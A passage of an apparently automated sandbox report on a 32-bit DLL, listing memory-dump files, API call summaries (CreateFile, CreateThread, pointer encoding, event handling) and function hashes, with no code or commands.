                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 919594a0ec907304819df75926c66910f54edd0394726166023e0c110724444d
                              • Instruction ID: 8bebb5c23091cc17d75ad7fb9851476a94353b3b5b5c5b93fde88e3207a4ff1b
                              • Opcode Fuzzy Hash: 919594a0ec907304819df75926c66910f54edd0394726166023e0c110724444d
                              • Instruction Fuzzy Hash: C6B01267C4E504C5C3C04DD441043873B30B757342F175C08E00881C92DE698F824151
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Free
                              • String ID:
                              • API String ID: 3978063606-0
                              • Opcode ID: f6c7b2e8447add577a18f5ba8dda4fb237d120bf5f0319e5c8f136d514d7abf0
                              • Instruction ID: 2c979c3ed7305063441b7ebb3453923632268f35b5f115a4c56677b026acf300
                              • Opcode Fuzzy Hash: f6c7b2e8447add577a18f5ba8dda4fb237d120bf5f0319e5c8f136d514d7abf0
                              • Instruction Fuzzy Hash: 8CB092B261128C578A422AD5E9064243A39A78A2E43141024E41A55A206E23D85C56AB
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Free
                              • String ID:
                              • API String ID: 3978063606-0
                              • Opcode ID: b7ace258a9b3be31553f2a90dd459b92037e156c8b1d0803e13a4138bdf52a7b
                              • Instruction ID: 4659df6949d4b21959f82edf95d8e6629149eeb8a24b3d41542581977534e94d
                              • Opcode Fuzzy Hash: b7ace258a9b3be31553f2a90dd459b92037e156c8b1d0803e13a4138bdf52a7b
                              • Instruction Fuzzy Hash: C8B092F820020C578B422AD5F9264243A3997C61A43209026E41A15A108E32D8585AAA
                              APIs
                              • _doexit.LIBCMT ref: 6CED0BB1
                                • Part of subcall function 6CED0CF4: __lock.LIBCMT ref: 6CED0D02
                                • Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(6CEEAE88,0000001C,6CED0C4D,00000000,00000001,00000000,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D41
                                • Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D52
                                • Part of subcall function 6CED0CF4: EncodePointer.KERNEL32(00000000,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D6B
                                • Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(-00000004,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D7B
                                • Part of subcall function 6CED0CF4: EncodePointer.KERNEL32(00000000,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D81
                                • Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D97
                                • Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0DA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Pointer$Decode$Encode$__lock_doexit
                              • String ID:
                              • API String ID: 2158581194-0
                              • Opcode ID: 78529122e2b46a8e68c069f2daa41a4ac46c1808f6e5ab6ec0525ec87f7e3659
                              • Instruction ID: a693f1f4ff0c5a4fc78fe1c5cfb7daf00d6ec370d055f5121665c9cda9a5c2b8
                              • Opcode Fuzzy Hash: 78529122e2b46a8e68c069f2daa41a4ac46c1808f6e5ab6ec0525ec87f7e3659
                              • Instruction Fuzzy Hash: EEA00265BD534021F86051543C43F9825111750F05FE90054BF082C6C0E5DA225D4157
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 65b36aa42775d0d210a4c5f9b698bceb3552d631280ddedf790ec85fe0f6cedd
                              • Instruction ID: 26fe762779a3591fcf95429325cbada6da0d8d21205c5dd1e5cf42d206113a19
                              • Opcode Fuzzy Hash: 65b36aa42775d0d210a4c5f9b698bceb3552d631280ddedf790ec85fe0f6cedd
                              • Instruction Fuzzy Hash: EAA02233288082CB82A00028000C00232B0030B3E03020CC0F002C3E00CF200C2833F0
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 94a529add9c10cab3723c14fced68e66f84783778ebd83780c9fabfe531d645f
                              • Instruction ID: 722cb71534427c52c7d411ccd32020f1694e9ee42775a5caaa487d03dd34a069
                              • Opcode Fuzzy Hash: 94a529add9c10cab3723c14fced68e66f84783778ebd83780c9fabfe531d645f
                              • Instruction Fuzzy Hash:
                              APIs
                                • Part of subcall function 6CEC9D70: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6CEC9E10
                                • Part of subcall function 6CEC9D70: CloseHandle.KERNEL32(00000000), ref: 6CEC9E25
                                • Part of subcall function 6CEC9D70: ResetEvent.KERNEL32(00000000), ref: 6CEC9E2F
                                • Part of subcall function 6CEC9D70: CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CEC9E64
                              • TlsSetValue.KERNEL32(00000023,?), ref: 6CECA91A
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
